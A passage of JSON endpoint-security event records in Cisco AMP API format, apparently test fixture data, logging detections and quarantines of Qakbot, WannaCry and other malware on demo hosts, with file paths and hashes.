Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":542000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} 